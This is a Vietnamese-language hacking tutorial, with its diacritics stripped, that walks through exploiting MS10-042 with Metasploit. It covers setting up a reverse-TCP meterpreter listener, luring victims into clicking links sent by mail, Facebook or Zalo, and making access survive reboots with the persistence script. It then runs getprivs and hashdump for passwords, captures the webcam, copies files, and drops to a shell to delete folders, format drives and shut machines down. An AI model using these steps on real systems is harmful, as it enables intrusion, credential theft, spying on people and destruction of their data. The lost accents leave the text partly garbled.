Dng lnh ifconfig xem a ch ip hacker y a ch l 192.168.1.112
Khai thc L hng ms10_042
Thc hin vi cu lnh chun b xm nhp my victim qua l hng:
t IP ca sever srvhost v lhost chnh l ip ca kali Set srvhost 192.168.1.112 Set lhost 192.168.1.112 To 1 payload ty vo nn tng OS ca victim m ta dng, c th l android hoc windows, sau l s dng con su meterpreter vi kt ni ngc giao thc tcp. Vic kt ni ngc ny s c thc hin bi chnh victim, khi h v tnh nhp vo nhng lin kt do hacker ging ra.
Sau y ta s quan st hin tng g khi victim v tnh nhp vo nhng lin kt m hacker gi cho h ( c th qua mail, facebook, zalo)
y l qu trnh rnh rp ch i con mi ri vo by, khi con mi sp by th lp
tc hnh ng
Meterpreter m port 1163 v ta c th lm vic trn port m, sau
chng ta c th nghch ngm ty . Ngoi ra th ta c th gi ng lot a ch ip ca hacker cho nhiu victim v ch cn 1 c click chut th s c 1 phin kt ni, s phin kt ni s lit k vo ct id, da vo id m ta s kt ni vs victim ti thi dim hin ti.
Sau ta dng lnh run persistence -S - A - U - X - i 1500 - p 8888
victim lun gi lin lc vs hacker, cho d tt my, hay khi ng li i chng na.
Th khi ng my Victim li:
Cc phin b close , sau khi khi ng xong ta thy c cc phin 4,5,6 t kt ni. Ta s dng lnh help hoc ? bit c nhng lnh g c php s dng.
Trong c nhng quyn v h thng, trn OS ta thng c nhng quyn ring
bit dnh cho guest, admin, everyone nhng i vi hacker h phi lm mi cch full quyn-18 quyn Dng lnh getprivs
Cu lnh c bn nh sysinfo gip ta xem thng tin my hoc c bit hn l
lnh hashdump. Cu lnh c th gip ta bit password vo my tnh. Nh 1 b gii m no m ta c th phin dch ra ngn ng latin, y password l khong trng.
Hoc cc bn c th chp webcam ca my victim, copy file t my tnh victim
Hay hn ta c th vit cc cu lnh Dos bn khng th trc tip to 1 file hay lm vic trn my victim bng cch th cng. Nhng bn c th lm iu bng Dos ngn ng tn tui gn lin vi Microsoft v hu ht cc bn s dng my tnh u bit n mn hnh en thui c nhng ch chy nh ma trn ny. Dng lnh shell vit lnh trc tip trn Cmd ca victim.
Sau thc thi cc lnh trong Dos nh: xa th mc, copy file, format, shutdown..v.v